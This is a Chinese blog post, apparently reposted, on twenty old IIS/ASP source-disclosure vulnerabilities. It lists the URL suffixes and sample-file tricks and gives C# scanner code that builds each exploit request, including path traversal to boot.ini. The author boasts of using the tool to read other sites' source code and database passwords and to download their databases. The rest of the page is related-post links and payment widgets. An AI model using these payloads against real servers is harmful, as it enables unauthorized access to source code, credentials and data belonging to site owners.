20种看asp源码的方法及工具

最新推荐文章于 2023-04-02 07:48:49 发布
最新推荐文章于 2023-04-02 07:48:49 发布 · 159 阅读 · 0
文章标签:

#ASP #ASP.net #IIS #OOP #网络应用

本文介绍了ASP和IIS相关的漏洞,包括在asp文件后添加特定字符、利用iis自带例子或系统漏洞等方式实现的漏洞,还提到了特别的translate:f方法需通过建立tcp/ip的socket连接发送请求使用,同时给出了部分漏洞使用的代码示例。
作者:欧杨飘雪 http://blog.youkuaiyun.com/flyingsnowy/

众所周知windows平台漏洞百出,补丁一个接一个,但总是补也补不净。我把我所知道的20种看asp源码的方法总结了一下,并且用c#写了个应用程序来扫描这些漏洞,发现虽然大部分的方法已经不起做用,但还是有一些漏网之鱼的:),结果这两天真看到不少站的源代码,包括数据库密码,如果用access的可以把库下载下来,而用sql server的如果不是用udl,dsn等来连接的话,也可以通过tcp/ip网络库连接到数据库,为所欲为呀。先面把这20种方法列在下面:

.
%81
::DATA
%2e
%2e%41sp
+.htr
\
longhtr
.bak
codebrws.asp
showcode.asp
null.htw
qfullhit.htw
qsumrhit.htw
query.idq
search/qfullhit.htw
search/qsumrhit.htw
iirturnh.htw
.htw
Translate:f


上边这些漏洞前面10几条是通过在asp文件后直接加上,如%81就是xxx.asp%81,后面这些都是通过iis自带的例子或系统漏洞实现的,最特别的是那种translate:f方法,它直接通过浏览器是无法使用的,必须同服务器建立tcp/ip的socket连接,发送请求才行,具体每个漏洞如何使用,看下面,这是我那个应用程序的一部分,如果你要全部的可以到我的站点去下载。

switch (this.cboMethod.SelectedIndex)
{
case 0: //直接读取
strRequestFile = strServer + strUrl ;
break ;
case 5 : //%2e%41sp
strRequestFile = strServer + strPath + strFirst
+ "%2e%41sp" ;
break ;
case 8 : //longhtr
strRequestFile = strServer + strUrl
+ "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
break ;

case 10: //codebrws.asp
strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
+ strUrl ;
break ;

case 11: //showcode.asp
strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
+ "/msadc/../../../../boot.ini" ;
break;

case 12 : //null.htw
strRequestFile = strServer + "/null.htw?CiWebHitsFile="
+ strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
break ;
case 13 : //qfullhit.htw
strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 14 : //qsumrhit.htw
strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 15 : //query.idq
strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";
break ;

case 16: //search/qfullhit.htw
strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 17: // search/qsumrhit.htw
strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 18: //iirturnh.htw
strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 19: //.htw
strRequestFile = strServer + strUrl
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full" ;
break ;

default:
strRequestFile = strServer + strUrl + this.cboMethod.Text ;
}

iteye_11848
关注
ASP源码—网址在线加密解密,网址加密解密方法工具.zip
10-31
ASP源码中,"网址在线加密解密"是指在Web应用中对URL进行编码和解码的过程,以保护敏感信息、防止中间人攻击或者进行特定的URL路由管理。下面我们将深入探讨ASP中实现这个功能的相关知识点。 1. ASP基础: ASP...
ASP源码—新华字典查询工具源码.zip
11-03
在本案例中,“ASP源码—新华字典查询工具源码.zip”是一个包含ASP源代码的压缩包,用于实现一个在线新华字典查询功能。这个工具可能允许用户通过输入汉字查询其含义、读音、部首、笔画数等相关信息,为学习和教学...
分享160个ASP源码,总有一款适合您
zy0412326的专栏
02-02 1421
ASP
分享134个ASP整站程序源码,总有一款适合您
zy0412326的专栏
04-02 1244
分享134个ASP整站程序源码,总有一款适合您
分享150个ASP源码,总有一款适合您
zy0412326的专栏
01-29 1325
ASP源码
分享154个ASP源码,总有一款适合您
zy0412326的专栏
02-01 2090
asp
ASP源码—淘宝在线代码生成工具源码 v1.0.zip
10-30
这个"ASP源码—淘宝在线代码生成工具源码 v1.0.zip"文件包含了一个基于ASP技术的特定应用,即淘宝在线代码生成工具。这种工具通常用于帮助开发者快速生成适用于淘宝平台的定制代码,例如店铺自定义模块、广告代码...
ASP源码—网速测试工具(强化版).zip
10-31
ASP源码—网速测试工具(强化版).zip是一个包含ASP编程语言编写的源代码的压缩文件,专用于创建一个网速测试平台。在互联网技术中,ASP(Active Server Pages)是微软开发的一种服务器端脚本环境,用于生成动态交互...
ASP源码—EVAL加密解密在线工具 v1.0.zip
10-14
ASP源码—EVAL加密解密在线工具 v1.0.zip
专用ASP代码调试工具
07-25
asp代码调试工具,把它放到你的asp文件所在文件夹中就可以使用了.不再安装麻烦的IIS就可以调试asp代码为你省去很多麻烦
asp考试题库源代码
07-19
解决方法: (1)、考试系统数据库默认安装目录在 “C:\NeoExam\ExamDatabase”文件夹下,您可以选中数据库“AccExamDatabase.mdb”点右键,查看属性。把“只读”选项的勾去掉就可以了。 (2)、可能是您不是Windows XP的最高管理员,不能修改安装软件的参数。请用最高管理员权限登陆。 (3)、IIS信息服务器里有设置访问权限的功能,可能您没有权限。请向修改过IIS信息服务器的人咨询。 (4)、可能是IIS信息服务器没有安装完整,请重新安装。 (5)、检查是否在IIS中对整个网站打开了“写入”权限,而不仅仅是数据库文件。 (6)、检查是否在WIN2000的资源管理器中,将网站所在目录对Everyone用户打开所有权限。如果您的考试系统安装在NTFS分区,则会显示“安全”选项卡。如果您的考试系统安装在FAT分区,则不会显示“安全”选项卡。对“安全”选项卡里的登陆用户,设定权限。 WIN2000 (NTFS分区)具体方法是:打开“我的电脑”,找到网站所在文件夹,在其上点右键,选“属性”,切换到“安全性”选项卡,在这里给Everyone用户所有权限。详情请看下面WIN XP的“安全”选项卡设置。 WIN2000 (FAT分区)具体方法是:打开“我的电脑”,找到网站所在文件夹,在其上点右键,选“属性”,切换到“共享”选项卡,选择“共享该文件夹”。再点击“权限”,在这里给Everyone用户所有权限。
ASP(AJAX)计算机竞赛答题源码(提交答案没问题)
09-10
计算机竞赛 '转发时请保留此声明信息,这段声明不并会影响你的速度! '*************************计算机竞赛******************* ' '作者tww(qq:43637507)、lyl '网站:http:// '电子邮件:43637507@qq.com 'WEB开发群:4531488 'QQ:43637507 '版权声明:版权所有,源代码公开,各种用途均可免费使用,但是修改后必须把修改后的文件 '发送一份给作者.并且保留作者此版权信息 '****************************************************************************** 更新: 2008-8-21 完成计算机竞赛程序框架 2008-8-22 修改竞赛规则,使文字录入不能粘贴,增加注册验证 修改录入分计算程序,增加笑话, 随机抽题程序采用首记录随机顺序取题 2008-8-23 增加竞赛个人心情下拉框 2008-8-24 修改随机抽题程序计算方法为任意抽取 修改顶部下拉框显示, 2008-8-25 去除随机英文句子、笑话、心情下拉框,增加用户查分、管理员查分, 将顶部文字调大,文字录入题放到最后, 修改提交答案程序,提交答案后先让用户确认,用户确定提交答案后不显示答案信息结束比赛 修改得分>0且<1时显示 修改退出比赛、结束比赛、提交等程序逻辑 2008-8-28 修改查分程序,增加管理功能 2008-9-3 修改界面颜色为蓝色天空 2008-9-4 修改录入题不输入时提交出错的问题,增加顶部图片 2008-9-5 完善计算机竞赛管理程序 计算机竞赛规则 总时间1小时,定时器倒记时,结束前15分钟提醒。题型包括文字录入题(20分),选择题(30题,每题2分),判断题(20题,每题1分),总分100 评分标准:用户提交答案后,由系统自动评分。文字录入题按文字录入数量判定基础分,再扣除错误文字的分(每错1字扣0.1分),如果扣除分大于基础分,则文字录入不得分。选择题和判断题根据标准答案,选择题做正确1题得2分,判断题做正确1题得1分。 文字录入题相同,选择题从选择题库中随机抽取30题,选择题答案大小写均可(输入A、B、C、D或a、b、c、d)判断题从判断题库中随机抽取20题,判断题答案大小写均可(正确则输入A或a,错误则输入B或b) 进入比赛界面后,点左上角“开始比赛”按钮正式进入比赛。 如果你感觉状态不佳想重新进行比赛,点左上角“退出比赛”按钮回到登录页面重新登录。注意当提交答案后,点"退出比赛",该用户不能再次登录,因为该用户已经结束比赛。 用户登录后不允许刷新页面,否则会自动退出比赛界面,然后需要重新登录才能进来。 所有题目在比赛界面显示,用户做完题目后,点提交按钮即可。当完成答题后,在比赛页面顶部左上角或提交按钮处可以看到得分,做错的题目后面会红字显示“错误”。 用户提交答案后,不能继续进行下一次竞赛答题,即只能进行一次竞赛答题,系统自动记录。
ASP在线考试程序(源码)
04-05
一个ASP在线测试程序,根据E灵通的代码改编,去除了所有的限制,增加了留言功能
分享124个ASP源码,总有一款适合您
zy0412326的专栏
01-22 1277
ASP
asp源码和php源码如何使用
山东大学 杨哲敏(数据库)
03-26 4417
20种看asp源码方法
jikong的专栏
02-23 1014
  众所周知windows平台漏洞百出,补丁一个接一个,但总是补也补不净。我把我所知道的20种看asp源码方法总结了一下,并且用c#写了个应用程序来扫描这些漏洞,发现虽然大部分的方法已经不起做用,但还是有一些漏网之鱼的:),结果这两天真看到不少站的源代码,包括数据库密码,如果用access的可以把库下载下来,而用sql server的如果不是用udl,dsn等来连接的话,也可以通过tcp/ip网
查看ASP源代码的方法
weixin_34064653的博客
08-09 656
查看ASP源代码的方法 以下正文: 我们都知道asp这一类的服务器端处理的程序,其好处之一就是只向客户端输出 标准的Html流。因此可以起到向客户隐藏细节的作用。也就是说当我们在浏览器中 键入asp程序的网址后只能看见标准的Html文件,而不能看见asp的内容。但有时, 例如在一个asp的教学站点,我们有必要显示a...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值